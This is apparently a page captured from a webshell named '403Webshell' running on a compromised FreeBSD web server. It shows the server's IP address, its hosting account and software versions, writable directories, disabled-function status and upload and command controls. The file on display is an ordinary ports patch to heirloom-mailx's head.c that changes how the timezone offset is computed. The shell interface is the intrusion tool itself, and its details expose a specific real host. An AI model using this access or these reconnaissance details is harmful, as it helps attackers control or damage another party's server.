403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/mail/heirloom-mailx/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/mail/heirloom-mailx/files/patch-head.c
--- head.c.orig	2006-03-03 16:01:19.000000000 -0800
+++ head.c	2022-01-26 18:13:57.270492000 -0800
@@ -1116,10 +1116,8 @@
 	if ((t = combinetime(year, month, day, hour, minute, second)) ==
 			(time_t)-1)
 		goto invalid;
-	tzdiff = t - mktime(gmtime(&t));
 	tmptr = localtime(&t);
-	if (tmptr->tm_isdst > 0)
-		tzdiff += 3600;
+	tzdiff = tmptr->tm_gmtoff; /* seconds east of GMT */
 	t -= tzdiff;
 	return t;
 invalid:

Youez - 2016 - github.com/yon3zu
LinuXploit